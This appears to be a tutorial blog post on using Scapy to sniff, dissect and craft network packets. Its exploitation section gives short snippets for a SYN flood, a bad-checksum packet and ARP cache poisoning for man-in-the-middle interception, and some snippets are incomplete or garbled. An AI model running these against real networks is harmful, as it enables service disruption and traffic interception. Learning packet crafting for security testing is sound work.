
How to Analyze and Exploit Network Protocols with Scapy

November 28, 20235 min read


Scapy is a powerful interactive packet manipulation program that is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It provides a very flexible framework for analyzing and exploiting the details of network protocols. Below, we’ll go through a detailed process of analyzing and exploiting network protocols using Scapy.


Before diving into the analysis and exploitation of network protocols with Scapy, you need to ensure that Scapy is installed on your system.

  • For Linux:

    sudo apt-get install scapy

  • For Windows and other systems:
    • Install Python
    • Install Scapy via pip:

      pip install scapy

Basics of Scapy

Understanding the basics of Scapy is crucial before starting the analysis:

  • Interactive Shell:Start by launching Scapy’s interactive shell by simply typing scapy in your terminal.
  • Creating Packets:You can create different types of packets with Scapy:from scapy.all import *

    # Example for creating an IP packet
    ip_packet = IP(dst=”″)

    # Example for creating a TCP segment
    tcp_segment = TCP(dport=80)

    # Combining layers to create a full packet
    full_packet = ip_packet/tcp_segment

    full_packet = ip_packet/tcp_segment

  • Displaying Packet Contents:To see the content of the packets, you can use .show() method.


Analyzing Network Protocols

To analyze network protocols with Scapy, follow the steps below:

  • Sniffing Packets:You can capture live packets from the network.

    packets = sniff(filter="tcp and port 80", count=10, iface="eth0")

  • Examining Packet Details:View details of captured packets.

    for packet in packets:

  • Working with Packet Layers:Extract information from specific layers.

    # Access the TCP layer tcp_layer = packet[TCP] # Print source and destination ports print(tcp_layer.sport, tcp_layer.dport)

  • Filtering Packets:Use filters to isolate specific types of packets.

    # Filter HTTP packets
    http_packets = [pkt for pkt in packets if pkt.haslayer(TCP) and pkt[TCP].dport == 80]

Exploiting Network Protocols

To exploit network protocols using Scapy, you need to understand the protocol’s structure and vulnerabilities. Consider the following processes:

  • Crafting Custom Packets:You may want to create non-standard packets to test how a system responds to unexpected or malicious input.

    # Crafting a SYN Flood attack for i in range(1000): ip_packet = IP(dst="") tcp_segment = TCP(sport=RandShort(), dport=80, flags="S") send(ip_packet/tcp_segment)

  • Sending Malformed Packets:Test the robustness of network hosts/applications against malformed packets.

    # Sending a packet with incorrect checksum packet_with_bad_checksum = IP(dst="", chksum=0x1234)/TCP() send(packet_with_bad_checksum)

  • Automating Attacks:Scapy can be scripted to automate attacks, such as ARP cache poisoning, which can be used to intercept traffic in a Man-in-the-Middle (MitM) attack.

    # ARP cache poisoning example arp_poison_packet = ARP(op=2, psrc="", pdst="", hwdst="ff:ff:ff:ff:ff:ff") send(arp_poison_packet)

Advanced Analysis and Exploitation

For advanced users, Scapy can be further leveraged for extensive protocol analysis and exploitation.

  • Dissecting Protocols:Breakdown custom protocols by creating a dissecting script.
  • Fuzzing:Use Scapy’s fuzzing capabilities to test the response of applications to unexpected or random input.
  • Traffic Visualization:Scapy can be used to visualize traffic for better analysis using graphical tools like Wireshark or through Scapy’s own graphical modules.
  • Integrating with Python:Scapy’s full potential is unlocked when integrated with Python scripts that can automate complex tasks.


Analyzing and exploiting network protocols with Scapy is both complex and powerful. With a solid understanding of network protocols and packet structures, as well as an awareness of the ethical and legal considerations, you can use Scapy to gain deep insights into network traffic, test network security, and even develop new network tools. Be mindful, however, that the exploitation of network vulnerabilities without permission is illegal and unethical; always ensure that your activities comply with the law and ethical standards.
